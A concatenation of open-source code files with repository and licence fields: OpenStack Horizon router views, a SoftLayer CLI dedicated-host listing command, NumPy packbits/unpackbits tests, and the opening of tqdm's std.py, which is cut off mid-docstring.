openstack_dashboard/dashboards/project/routers/views.py
|
36
|
8431
|
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing Neutron Routers.
"""
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.datastructures import SortedDict
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon import tables
from horizon import tabs
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.routers\
import forms as project_forms
from openstack_dashboard.dashboards.project.routers import tables as rtables
from openstack_dashboard.dashboards.project.routers import tabs as rdtabs
class IndexView(tables.DataTableView):
    """Table view listing the current tenant's Neutron routers."""
    table_class = rtables.RoutersTable
    template_name = 'project/routers/index.html'
    page_title = _("Routers")

    def _get_routers(self, search_opts=None):
        # Fetch routers scoped to the current tenant; on failure show an
        # error message and fall back to an empty table.
        try:
            tenant_id = self.request.user.tenant_id
            routers = api.neutron.router_list(self.request,
                                              tenant_id=tenant_id,
                                              search_opts=search_opts)
        except Exception:
            routers = []
            exceptions.handle(self.request,
                              _('Unable to retrieve router list.'))
        ext_net_dict = self._list_external_networks()
        for r in routers:
            # Display the ID when the router has no name, and resolve the
            # gateway network id to its display name.
            r.name = r.name_or_id
            self._set_external_network(r, ext_net_dict)
        return routers

    def get_data(self):
        routers = self._get_routers()
        return routers

    def _list_external_networks(self):
        # Build a map of external network id -> display name used to
        # annotate each router's gateway info.
        try:
            search_opts = {'router:external': True}
            ext_nets = api.neutron.network_list(self.request,
                                                **search_opts)
            ext_net_dict = SortedDict((n['id'], n.name_or_id)
                                      for n in ext_nets)
        except Exception as e:
            msg = _('Unable to retrieve a list of external networks "%s".') % e
            exceptions.handle(self.request, msg)
            ext_net_dict = {}
        return ext_net_dict

    def _set_external_network(self, router, ext_net_dict):
        gateway_info = router.external_gateway_info
        if gateway_info:
            ext_net_id = gateway_info['network_id']
            if ext_net_id in ext_net_dict:
                gateway_info['network'] = ext_net_dict[ext_net_id]
            else:
                msg_params = {'ext_net_id': ext_net_id, 'router_id': router.id}
                msg = _('External network "%(ext_net_id)s" expected but not '
                        'found for router "%(router_id)s".') % msg_params
                messages.error(self.request, msg)
                # gateway_info['network'] is just the network name, so putting
                # in a smallish error message in the table is reasonable.
                gateway_info['network'] = pgettext_lazy(
                    'External network not found',
                    # Translators: The usage is "<UUID of ext_net> (Not Found)"
                    u'%s (Not Found)') % ext_net_id
class DetailView(tabs.TabbedTableView):
    """Tabbed detail page for a single Neutron router."""
    tab_group_class = rdtabs.RouterDetailTabs
    template_name = 'project/routers/detail.html'
    failure_url = reverse_lazy('horizon:project:routers:index')
    page_title = _("Router Details")

    @memoized.memoized_method
    def _get_data(self):
        # Fetch the router once per request (memoized); on error,
        # exceptions.handle() redirects back to the index view.
        try:
            router_id = self.kwargs['router_id']
            router = api.neutron.router_get(self.request, router_id)
            router.set_id_as_name_if_empty(length=0)
        except Exception:
            # NOTE(review): if the kwargs lookup itself raised, router_id
            # would be unbound in the message below -- presumably URL
            # routing guarantees 'router_id' is present; confirm.
            msg = _('Unable to retrieve details for router "%s".') \
                % router_id
            exceptions.handle(self.request, msg, redirect=self.failure_url)
        if router.external_gateway_info:
            # Resolve the gateway network id to its name for display;
            # fall back to the raw id when the network cannot be fetched.
            ext_net_id = router.external_gateway_info['network_id']
            try:
                ext_net = api.neutron.network_get(self.request, ext_net_id,
                                                  expand_subnet=False)
                ext_net.set_id_as_name_if_empty(length=0)
                router.external_gateway_info['network'] = ext_net.name
            except Exception:
                msg = _('Unable to retrieve an external network "%s".') \
                    % ext_net_id
                exceptions.handle(self.request, msg)
                router.external_gateway_info['network'] = ext_net_id
        return router

    @memoized.memoized_method
    def _get_ports(self):
        try:
            ports = api.neutron.port_list(self.request,
                                          device_id=self.kwargs['router_id'])
        except Exception:
            ports = []
            msg = _('Unable to retrieve port details.')
            exceptions.handle(self.request, msg)
        return ports

    def get_context_data(self, **kwargs):
        context = super(DetailView, self).get_context_data(**kwargs)
        router = self._get_data()
        table = rtables.RoutersTable(self.request)
        context["router"] = router
        context["url"] = self.failure_url
        # Reuse the index table's row actions on the detail page.
        context["actions"] = table.render_row_actions(router)
        context['dvr_supported'] = api.neutron.get_feature_permission(
            self.request, "dvr", "get")
        context['ha_supported'] = api.neutron.get_feature_permission(
            self.request, "l3-ha", "get")
        return context

    def get_tabs(self, request, *args, **kwargs):
        router = self._get_data()
        ports = self._get_ports()
        return self.tab_group_class(request, router=router,
                                    ports=ports, **kwargs)
class CreateView(forms.ModalFormView):
    """Modal form view for creating a new router."""
    form_class = project_forms.CreateForm
    form_id = "create_router_form"
    modal_header = _("Create Router")
    template_name = 'project/routers/create.html'
    success_url = reverse_lazy("horizon:project:routers:index")
    page_title = _("Create Router")
    submit_label = _("Create Router")
    submit_url = reverse_lazy("horizon:project:routers:create")
class UpdateView(forms.ModalFormView):
    """Modal form for editing an existing router's basic properties."""

    form_class = project_forms.UpdateForm
    form_id = "update_router_form"
    modal_header = _("Edit Router")
    template_name = 'project/routers/update.html'
    success_url = reverse_lazy("horizon:project:routers:index")
    page_title = _("Update Router")
    submit_label = _("Save Changes")
    # URL pattern name only; resolved with the router id in get_context_data.
    submit_url = "horizon:project:routers:update"

    def get_context_data(self, **kwargs):
        """Add the router id and the fully-resolved submit URL."""
        context = super(UpdateView, self).get_context_data(**kwargs)
        args = (self.kwargs['router_id'],)
        context["router_id"] = self.kwargs['router_id']
        context['submit_url'] = reverse(self.submit_url, args=args)
        return context

    def _get_object(self, *args, **kwargs):
        """Fetch the router being edited.

        On failure, calls exceptions.handle with redirect=; get_initial
        assumes a router object was returned (NOTE(review): relies on
        handle() aborting the request — confirm).
        """
        router_id = self.kwargs['router_id']
        try:
            return api.neutron.router_get(self.request, router_id)
        except Exception:
            redirect = self.success_url
            msg = _('Unable to retrieve router details.')
            exceptions.handle(self.request, msg, redirect=redirect)

    def get_initial(self):
        """Seed the form with the router's current settings."""
        router = self._get_object()
        initial = {'router_id': router['id'],
                   'tenant_id': router['tenant_id'],
                   'name': router['name'],
                   'admin_state': router['admin_state_up']}
        # Optional attributes: only present when the corresponding neutron
        # extensions (distributed routing / L3 HA) are enabled.
        if hasattr(router, 'distributed'):
            initial['mode'] = ('distributed' if router.distributed
                               else 'centralized')
        if hasattr(router, 'ha'):
            initial['ha'] = router.ha
        return initial
|
apache-2.0
|
softlayer/softlayer-python
|
SoftLayer/CLI/dedicatedhost/list.py
|
4
|
2313
|
"""List dedicated servers."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import columns as column_helper
from SoftLayer.CLI import environment
from SoftLayer.CLI import formatting
from SoftLayer.CLI import helpers
# Optional columns selectable via --columns; each entry maps a column name
# to the attribute path (or formatter callable) producing its value.
COLUMNS = [
    column_helper.Column('datacenter', ('datacenter', 'name')),
    column_helper.Column(
        'created_by',
        ('billingItem', 'orderItem', 'order', 'userRecord', 'username')),
    column_helper.Column(
        'tags',
        lambda server: formatting.tags(server.get('tagReferences')),
        mask="tagReferences.tag.name"),
]

# Columns displayed when --columns is not given.
DEFAULT_COLUMNS = [
    'id',
    'name',
    'cpuCount',
    'diskCapacity',
    'memoryCapacity',
    'datacenter',
    'guestCount',
]
@click.command()
@click.option('--cpu', '-c', help='Number of CPU cores', type=click.INT)
@helpers.multi_option('--tag', help='Filter by tags')
@click.option('--sortby', help='Column to sort by',
              default='name',
              show_default=True)
@click.option('--columns',
              callback=column_helper.get_formatter(COLUMNS),
              help='Columns to display. [options: %s]'
                   % ', '.join(column.name for column in COLUMNS),
              default=','.join(DEFAULT_COLUMNS),
              show_default=True)
@click.option('--datacenter', '-d', help='Datacenter shortname')
@click.option('--name', '-H', help='Host portion of the FQDN')
@click.option('--memory', '-m', help='Memory capacity in mebibytes',
              type=click.INT)
@click.option('--disk', '-D', help='Disk capacity')
@environment.pass_env
def cli(env, sortby, cpu, columns, datacenter, name, memory, disk, tag):
    """List dedicated host."""
    mgr = SoftLayer.DedicatedHostManager(env.client)
    # All filters are optional; the mask limits the API response to the
    # fields needed for the selected columns.
    hosts = mgr.list_instances(cpus=cpu,
                               datacenter=datacenter,
                               hostname=name,
                               memory=memory,
                               disk=disk,
                               tags=tag,
                               mask=columns.mask())
    table = formatting.Table(columns.columns)
    table.sortby = sortby
    for host in hosts:
        # Substitute a blank placeholder for missing values.
        table.add_row([value or formatting.blank()
                       for value in columns.row(host)])
    env.fout(table)
|
mit
|
gfyoung/numpy
|
numpy/lib/tests/test_packbits.py
|
17
|
12851
|
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import assert_array_equal, assert_equal, assert_raises
def test_packbits():
    """Pack along the last axis for every bool/integer dtype."""
    data = [[[1, 0, 1], [0, 1, 0]],
            [[1, 1, 0], [0, 0, 1]]]
    expected = np.array([[[160], [64]], [[192], [32]]])
    for dtype_code in '?bBhHiIlLqQ':
        packed = np.packbits(np.array(data, dtype=dtype_code), axis=-1)
        assert_equal(packed.dtype, np.uint8)
        assert_array_equal(packed, expected)
    # Floating-point input is rejected outright.
    assert_raises(TypeError, np.packbits, np.array(data, dtype=float))
def test_packbits_empty():
    """Packing any empty array yields an empty uint8 result."""
    empty_shapes = [
        (0,), (10, 20, 0), (10, 0, 20), (0, 10, 20), (20, 0, 0), (0, 20, 0),
        (0, 0, 20), (0, 0, 0),
    ]
    for dtype_code in '?bBhHiIlLqQ':
        for shape in empty_shapes:
            packed = np.packbits(np.empty(shape, dtype=dtype_code))
            assert_equal(packed.dtype, np.uint8)
            assert_equal(packed.shape, (0,))
def test_packbits_empty_with_axis():
    """Empty arrays pack to the expected shape along each axis."""
    # (input shape, [expected packed shape for axis 0, 1, 2, ...])
    cases = [
        ((0,), [(0,)]),
        ((10, 20, 0), [(2, 20, 0), (10, 3, 0), (10, 20, 0)]),
        ((10, 0, 20), [(2, 0, 20), (10, 0, 20), (10, 0, 3)]),
        ((0, 10, 20), [(0, 10, 20), (0, 2, 20), (0, 10, 3)]),
        ((20, 0, 0), [(3, 0, 0), (20, 0, 0), (20, 0, 0)]),
        ((0, 20, 0), [(0, 20, 0), (0, 3, 0), (0, 20, 0)]),
        ((0, 0, 20), [(0, 0, 20), (0, 0, 20), (0, 0, 3)]),
        ((0, 0, 0), [(0, 0, 0), (0, 0, 0), (0, 0, 0)]),
    ]
    for dtype_code in '?bBhHiIlLqQ':
        for in_shape, per_axis in cases:
            for axis, want in enumerate(per_axis):
                packed = np.packbits(np.empty(in_shape, dtype=dtype_code),
                                     axis=axis)
                assert_equal(packed.dtype, np.uint8)
                assert_equal(packed.shape, want)
def test_packbits_large():
    # test data large enough for 16 byte vectorization
    a = np.array([1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0,
                  0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1,
                  1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0,
                  1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1,
                  1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1,
                  1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1,
                  1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1,
                  0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1,
                  1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0,
                  1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1,
                  1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0,
                  0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 1,
                  1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0,
                  1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0,
                  1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0])
    # 300 elements repeated to 900 so the reshape to (36, 25) below works.
    a = a.repeat(3)
    for dtype in '?bBhHiIlLqQ':
        arr = np.array(a, dtype=dtype)
        b = np.packbits(arr, axis=None)
        assert_equal(b.dtype, np.uint8)
        # Expected packed bytes (precomputed reference values).
        r = [252, 127, 192, 3, 254, 7, 252, 0, 7, 31, 240, 0, 28, 1, 255, 252,
             113, 248, 3, 255, 192, 28, 15, 192, 28, 126, 0, 224, 127, 255,
             227, 142, 7, 31, 142, 63, 28, 126, 56, 227, 240, 0, 227, 128, 63,
             224, 14, 56, 252, 112, 56, 255, 241, 248, 3, 240, 56, 224, 112,
             63, 255, 255, 199, 224, 14, 0, 31, 143, 192, 3, 255, 199, 0, 1,
             255, 224, 1, 255, 252, 126, 63, 0, 1, 192, 252, 14, 63, 0, 15,
             199, 252, 113, 255, 3, 128, 56, 252, 14, 7, 0, 113, 255, 255, 142, 56, 227,
             129, 248, 227, 129, 199, 31, 128]
        assert_array_equal(b, r)
        # equal for size being multiple of 8
        assert_array_equal(np.unpackbits(b)[:-4], a)

        # check last byte of different remainders (16 byte vectorization)
        b = [np.packbits(arr[:-i], axis=None)[-1] for i in range(1, 16)]
        assert_array_equal(b, [128, 128, 128, 31, 30, 28, 24, 16, 0, 0, 0, 199,
                               198, 196, 192])

        arr = arr.reshape(36, 25)
        b = np.packbits(arr, axis=0)
        assert_equal(b.dtype, np.uint8)
        assert_array_equal(b, [[190, 186, 178, 178, 150, 215, 87, 83, 83, 195,
                                199, 206, 204, 204, 140, 140, 136, 136, 8, 40, 105,
                                107, 75, 74, 88],
                               [72, 216, 248, 241, 227, 195, 202, 90, 90, 83,
                                83, 119, 127, 109, 73, 64, 208, 244, 189, 45,
                                41, 104, 122, 90, 18],
                               [113, 120, 248, 216, 152, 24, 60, 52, 182, 150,
                                150, 150, 146, 210, 210, 246, 255, 255, 223,
                                151, 21, 17, 17, 131, 163],
                               [214, 210, 210, 64, 68, 5, 5, 1, 72, 88, 92,
                                92, 78, 110, 39, 181, 149, 220, 222, 218, 218,
                                202, 234, 170, 168],
                               [0, 128, 128, 192, 80, 112, 48, 160, 160, 224,
                                240, 208, 144, 128, 160, 224, 240, 208, 144,
                                144, 176, 240, 224, 192, 128]])

        b = np.packbits(arr, axis=1)
        assert_equal(b.dtype, np.uint8)
        assert_array_equal(b, [[252, 127, 192, 0],
                               [7, 252, 15, 128],
                               [240, 0, 28, 0],
                               [255, 128, 0, 128],
                               [192, 31, 255, 128],
                               [142, 63, 0, 0],
                               [255, 240, 7, 0],
                               [7, 224, 14, 0],
                               [126, 0, 224, 0],
                               [255, 255, 199, 0],
                               [56, 28, 126, 0],
                               [113, 248, 227, 128],
                               [227, 142, 63, 0],
                               [0, 28, 112, 0],
                               [15, 248, 3, 128],
                               [28, 126, 56, 0],
                               [56, 255, 241, 128],
                               [240, 7, 224, 0],
                               [227, 129, 192, 128],
                               [255, 255, 254, 0],
                               [126, 0, 224, 0],
                               [3, 241, 248, 0],
                               [0, 255, 241, 128],
                               [128, 0, 255, 128],
                               [224, 1, 255, 128],
                               [248, 252, 126, 0],
                               [0, 7, 3, 128],
                               [224, 113, 248, 0],
                               [0, 252, 127, 128],
                               [142, 63, 224, 0],
                               [224, 14, 63, 0],
                               [7, 3, 128, 0],
                               [113, 255, 255, 128],
                               [28, 113, 199, 0],
                               [7, 227, 142, 0],
                               [14, 56, 252, 0]])

        arr = arr.T.copy()
        b = np.packbits(arr, axis=0)
        assert_equal(b.dtype, np.uint8)
        assert_array_equal(b, [[252, 7, 240, 255, 192, 142, 255, 7, 126, 255,
                                56, 113, 227, 0, 15, 28, 56, 240, 227, 255,
                                126, 3, 0, 128, 224, 248, 0, 224, 0, 142, 224,
                                7, 113, 28, 7, 14],
                               [127, 252, 0, 128, 31, 63, 240, 224, 0, 255,
                                28, 248, 142, 28, 248, 126, 255, 7, 129, 255,
                                0, 241, 255, 0, 1, 252, 7, 113, 252, 63, 14,
                                3, 255, 113, 227, 56],
                               [192, 15, 28, 0, 255, 0, 7, 14, 224, 199, 126,
                                227, 63, 112, 3, 56, 241, 224, 192, 254, 224,
                                248, 241, 255, 255, 126, 3, 248, 127, 224, 63,
                                128, 255, 199, 142, 252],
                               [0, 128, 0, 128, 128, 0, 0, 0, 0, 0, 0, 128, 0,
                                0, 128, 0, 128, 0, 128, 0, 0, 0, 128, 128,
                                128, 0, 128, 0, 128, 0, 0, 0, 128, 0, 0, 0]])

        b = np.packbits(arr, axis=1)
        assert_equal(b.dtype, np.uint8)
        assert_array_equal(b, [[190, 72, 113, 214, 0],
                               [186, 216, 120, 210, 128],
                               [178, 248, 248, 210, 128],
                               [178, 241, 216, 64, 192],
                               [150, 227, 152, 68, 80],
                               [215, 195, 24, 5, 112],
                               [87, 202, 60, 5, 48],
                               [83, 90, 52, 1, 160],
                               [83, 90, 182, 72, 160],
                               [195, 83, 150, 88, 224],
                               [199, 83, 150, 92, 240],
                               [206, 119, 150, 92, 208],
                               [204, 127, 146, 78, 144],
                               [204, 109, 210, 110, 128],
                               [140, 73, 210, 39, 160],
                               [140, 64, 246, 181, 224],
                               [136, 208, 255, 149, 240],
                               [136, 244, 255, 220, 208],
                               [8, 189, 223, 222, 144],
                               [40, 45, 151, 218, 144],
                               [105, 41, 21, 218, 176],
                               [107, 104, 17, 202, 240],
                               [75, 122, 17, 234, 224],
                               [74, 90, 131, 170, 192],
                               [88, 18, 163, 168, 128]])

    # result is the same if input is multiplied with a nonzero value
    for dtype in 'bBhHiIlLqQ':
        arr = np.array(a, dtype=dtype)
        rnd = np.random.randint(low=np.iinfo(dtype).min,
                                high=np.iinfo(dtype).max, size=arr.size,
                                dtype=dtype)
        rnd[rnd == 0] = 1
        arr *= rnd.astype(dtype)
        b = np.packbits(arr, axis=-1)
        assert_array_equal(np.unpackbits(b)[:-4], a)

    assert_raises(TypeError, np.packbits, np.array(a, dtype=float))
def test_packbits_very_large():
    # test some with a larger arrays gh-8637
    # code is covered earlier but larger array makes crash on bug more likely
    for s in range(950, 1050):
        for dt in '?bBhHiIlLqQ':
            # Fix: use the loop's dtype.  Previously `dt` was unused and the
            # array was always bool, so only one dtype was ever exercised.
            x = np.ones((200, s), dtype=dt)
            np.packbits(x, axis=1)
def test_unpackbits():
    """Each uint8 value expands to its 8-bit big-endian representation."""
    packed = np.array([[2], [7], [23]], dtype=np.uint8)
    unpacked = np.unpackbits(packed, axis=1)
    assert_equal(unpacked.dtype, np.uint8)
    expected = np.array([[0, 0, 0, 0, 0, 0, 1, 0],
                         [0, 0, 0, 0, 0, 1, 1, 1],
                         [0, 0, 0, 1, 0, 1, 1, 1]])
    assert_array_equal(unpacked, expected)
def test_unpackbits_empty():
    """Unpacking an empty uint8 array yields an empty uint8 array."""
    unpacked = np.unpackbits(np.empty((0,), dtype=np.uint8))
    assert_equal(unpacked.dtype, np.uint8)
    assert_array_equal(unpacked, np.empty((0,)))
def test_unpackbits_empty_with_axis():
    """Empty arrays unpack to the expected shape along each axis."""
    # ([packed shape for axis 0, 1, 2, ...], unpacked shape)
    cases = [
        ([(0,)], (0,)),
        ([(2, 24, 0), (16, 3, 0), (16, 24, 0)], (16, 24, 0)),
        ([(2, 0, 24), (16, 0, 24), (16, 0, 3)], (16, 0, 24)),
        ([(0, 16, 24), (0, 2, 24), (0, 16, 3)], (0, 16, 24)),
        ([(3, 0, 0), (24, 0, 0), (24, 0, 0)], (24, 0, 0)),
        ([(0, 24, 0), (0, 3, 0), (0, 24, 0)], (0, 24, 0)),
        ([(0, 0, 24), (0, 0, 24), (0, 0, 3)], (0, 0, 24)),
        ([(0, 0, 0), (0, 0, 0), (0, 0, 0)], (0, 0, 0)),
    ]
    for per_axis, want in cases:
        for axis, in_shape in enumerate(per_axis):
            unpacked = np.unpackbits(np.empty(in_shape, dtype=np.uint8),
                                     axis=axis)
            assert_equal(unpacked.dtype, np.uint8)
            assert_equal(unpacked.shape, want)
def test_unpackbits_large():
    """pack(unpack(x)) is the identity, checked against tested packbits."""
    values = np.arange(277, dtype=np.uint8)
    # contiguous and strided 1-D inputs
    for flat in (values, values[::2]):
        assert_array_equal(np.packbits(np.unpackbits(flat)), flat)
    tiled = np.tile(values, (3, 1))
    assert_array_equal(np.packbits(np.unpackbits(tiled, axis=1), axis=1),
                       tiled)
    transposed = tiled.T.copy()
    assert_array_equal(
        np.packbits(np.unpackbits(transposed, axis=0), axis=0), transposed)
|
bsd-3-clause
|
Eric89GXL/mne-python
|
mne/externals/tqdm/_tqdm/std.py
|
14
|
55471
|
"""
Customisable progressbar decorator for iterators.
Includes a default (x)range iterator printing to stderr.
Usage:
>>> from tqdm import trange[, tqdm]
>>> for i in trange(10): #same as: for i in tqdm(xrange(10))
... ...
"""
from __future__ import absolute_import, division
# compatibility functions and utilities
from .utils import _supports_unicode, _environ_cols_wrapper, _range, _unich, \
_term_move_up, _unicode, WeakSet, _basestring, _OrderedDict, _text_width, \
Comparable, RE_ANSI, _is_ascii, FormatReplace, \
SimpleTextIOWrapper, CallbackIOWrapper
from ._monitor import TMonitor
# native libraries
from contextlib import contextmanager
import sys
from numbers import Number
from time import time
# For parallelism safety
import threading as th
from warnings import warn
__author__ = {"github.com/": ["noamraph", "obiwanus", "kmike", "hadim",
"casperdcl", "lrq3000"]}
__all__ = ['tqdm', 'trange',
'TqdmTypeError', 'TqdmKeyError', 'TqdmWarning',
'TqdmExperimentalWarning', 'TqdmDeprecationWarning',
'TqdmMonitorWarning']
class TqdmTypeError(TypeError):
    """TypeError subclass raised by tqdm."""
    pass
class TqdmKeyError(KeyError):
    """KeyError subclass raised by tqdm."""
    pass
class TqdmWarning(Warning):
    """Base class for all tqdm warnings.

    Used for non-external-code-breaking errors, such as garbled printing.
    """
    def __init__(self, msg, fp_write=None, *a, **k):
        # When a writer callable is supplied, emit the message directly
        # instead of going through the normal Warning machinery.
        if fp_write is None:
            super(TqdmWarning, self).__init__(msg, *a, **k)
        else:
            text = str(msg).rstrip()
            fp_write('\n%s: %s\n' % (self.__class__.__name__, text))
class TqdmExperimentalWarning(TqdmWarning, FutureWarning):
    """beta feature, unstable API and behaviour"""
    pass
class TqdmDeprecationWarning(TqdmWarning, DeprecationWarning):
    """Deprecated tqdm feature or usage pattern."""
    # not suppressed if raised
    pass
class TqdmMonitorWarning(TqdmWarning, RuntimeWarning):
    """tqdm monitor errors which do not affect external functionality"""
    # e.g. issued when the TMonitor thread cannot be created (tqdm.__new__).
    pass
class TqdmDefaultWriteLock(object):
    """
    Provide a default write lock for thread and multiprocessing safety.
    Works only on platforms supporting `fork` (so Windows is excluded).
    You must initialise a `tqdm` or `TqdmDefaultWriteLock` instance
    before forking in order for the write lock to work.
    On Windows, you need to supply the lock from the parent to the children as
    an argument to joblib or the parallelism lib you use.
    """
    def __init__(self):
        # Create global parallelism locks to avoid racing issues with parallel
        # bars works only if fork available (Linux/MacOSX, but not Windows)
        self.create_mp_lock()
        self.create_th_lock()
        cls = type(self)
        # Keep only the locks that could actually be constructed.
        self.locks = [lk for lk in [cls.mp_lock, cls.th_lock] if lk is not None]

    def acquire(self, *a, **k):
        # Acquire every backing lock, in list order (mp before th).
        for lock in self.locks:
            lock.acquire(*a, **k)

    def release(self):
        for lock in self.locks[::-1]:  # Release in inverse order of acquisition
            lock.release()

    def __enter__(self):
        self.acquire()

    def __exit__(self, *exc):
        self.release()

    @classmethod
    def create_mp_lock(cls):
        # Lazily create the process-level lock once per class; None when the
        # platform cannot provide one (import failure or OS-level failure).
        if not hasattr(cls, 'mp_lock'):
            try:
                from multiprocessing import RLock
                cls.mp_lock = RLock()  # multiprocessing lock
            except ImportError:  # pragma: no cover
                cls.mp_lock = None
            except OSError:  # pragma: no cover
                cls.mp_lock = None

    @classmethod
    def create_th_lock(cls):
        # Lazily create the thread-level lock once per class.
        if not hasattr(cls, 'th_lock'):
            try:
                cls.th_lock = th.RLock()  # thread lock
            except OSError:  # pragma: no cover
                cls.th_lock = None
# Create a thread lock before instantiation so that no setup needs to be done
# before running in a multithreaded environment.
# Do not create the multiprocessing lock because it sets the multiprocessing
# context and does not allow the user to use 'spawn' or 'forkserver' methods.
TqdmDefaultWriteLock.create_th_lock()
class Bar(object):
    """
    `str.format`-able bar with format specifiers: `[width][type]`
    - `width`
      + unspecified (default): use `self.default_len`
      + `int >= 0`: overrides `self.default_len`
      + `int < 0`: subtract from `self.default_len`
    - `type`
      + `a`: ascii (`charset=self.ASCII` override)
      + `u`: unicode (`charset=self.UTF` override)
      + `b`: blank (`charset=" "` override)
    """
    ASCII = " 123456789#"
    # Unicode partial-block characters, thinnest (U+258F) to thickest.
    UTF = u" " + u''.join(map(_unich, range(0x258F, 0x2587, -1)))
    BLANK = " "

    def __init__(self, frac, default_len=10, charset=UTF):
        # frac: completed fraction in [0, 1]; out-of-range values are clamped
        # with a warning rather than rejected.
        if not (0 <= frac <= 1):
            warn("clamping frac to range [0, 1]", TqdmWarning, stacklevel=2)
            frac = max(0, min(1, frac))
        assert default_len > 0
        self.frac = frac
        self.default_len = default_len
        self.charset = charset

    def __format__(self, format_spec):
        # Parse the `[width][type]` spec; `type` is the final character.
        if format_spec:
            _type = format_spec[-1].lower()
            try:
                charset = dict(a=self.ASCII, u=self.UTF, b=self.BLANK)[_type]
            except KeyError:
                # Last char was not a type letter: whole spec is the width.
                charset = self.charset
            else:
                format_spec = format_spec[:-1]
            if format_spec:
                N_BARS = int(format_spec)
                if N_BARS < 0:
                    # Negative width is relative to the default length.
                    N_BARS += self.default_len
            else:
                N_BARS = self.default_len
        else:
            charset = self.charset
            N_BARS = self.default_len

        # Count of fully-filled cells, and the symbol index for the
        # fractional cell (charset is ordered empty -> full).
        nsyms = len(charset) - 1
        bar_length, frac_bar_length = divmod(
            int(self.frac * N_BARS * nsyms), nsyms)
        bar = charset[-1] * bar_length
        frac_bar = charset[frac_bar_length]

        # whitespace padding
        if bar_length < N_BARS:
            return bar + frac_bar + \
                charset[0] * (N_BARS - bar_length - 1)
        return bar
class tqdm(Comparable):
"""
Decorate an iterable object, returning an iterator which acts exactly
like the original iterable, but prints a dynamically updating
progressbar every time a value is requested.
"""
monitor_interval = 10 # set to 0 to disable the thread
monitor = None
@staticmethod
def format_sizeof(num, suffix='', divisor=1000):
"""
Formats a number (greater than unity) with SI Order of Magnitude
prefixes.
Parameters
----------
num : float
Number ( >= 1) to format.
suffix : str, optional
Post-postfix [default: ''].
divisor : float, optional
Divisor between prefixes [default: 1000].
Returns
-------
out : str
Number with Order of Magnitude SI unit postfix.
"""
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 999.5:
if abs(num) < 99.95:
if abs(num) < 9.995:
return '{0:1.2f}'.format(num) + unit + suffix
return '{0:2.1f}'.format(num) + unit + suffix
return '{0:3.0f}'.format(num) + unit + suffix
num /= divisor
return '{0:3.1f}Y'.format(num) + suffix
@staticmethod
def format_interval(t):
"""
Formats a number of seconds as a clock time, [H:]MM:SS
Parameters
----------
t : int
Number of seconds.
Returns
-------
out : str
[H:]MM:SS
"""
mins, s = divmod(int(t), 60)
h, m = divmod(mins, 60)
if h:
return '{0:d}:{1:02d}:{2:02d}'.format(h, m, s)
else:
return '{0:02d}:{1:02d}'.format(m, s)
@staticmethod
def format_num(n):
"""
Intelligent scientific notation (.3g).
Parameters
----------
n : int or float or Numeric
A Number.
Returns
-------
out : str
Formatted number.
"""
f = '{0:.3g}'.format(n).replace('+0', '+').replace('-0', '-')
n = str(n)
return f if len(f) < len(n) else n
@staticmethod
def ema(x, mu=None, alpha=0.3):
"""
Exponential moving average: smoothing to give progressively lower
weights to older values.
Parameters
----------
x : float
New value to include in EMA.
mu : float, optional
Previous EMA value.
alpha : float, optional
Smoothing factor in range [0, 1], [default: 0.3].
Increase to give more weight to recent values.
Ranges from 0 (yields mu) to 1 (yields x).
"""
return x if mu is None else (alpha * x) + (1 - alpha) * mu
@staticmethod
def status_printer(file):
"""
Manage the printing and in-place updating of a line of characters.
Note that if the string is longer than a line, then in-place
updating may not work (it will print a new line at each refresh).
"""
fp = file
fp_flush = getattr(fp, 'flush', lambda: None) # pragma: no cover
def fp_write(s):
fp.write(_unicode(s))
fp_flush()
last_len = [0]
def print_status(s):
len_s = len(s)
fp_write('\r' + s + (' ' * max(last_len[0] - len_s, 0)))
last_len[0] = len_s
return print_status
    @staticmethod
    def format_meter(n, total, elapsed, ncols=None, prefix='', ascii=False,
                     unit='it', unit_scale=False, rate=None, bar_format=None,
                     postfix=None, unit_divisor=1000, **extra_kwargs):
        """
        Return a string-based progress bar given some parameters

        Parameters
        ----------
        n  : int or float
            Number of finished iterations.
        total  : int or float
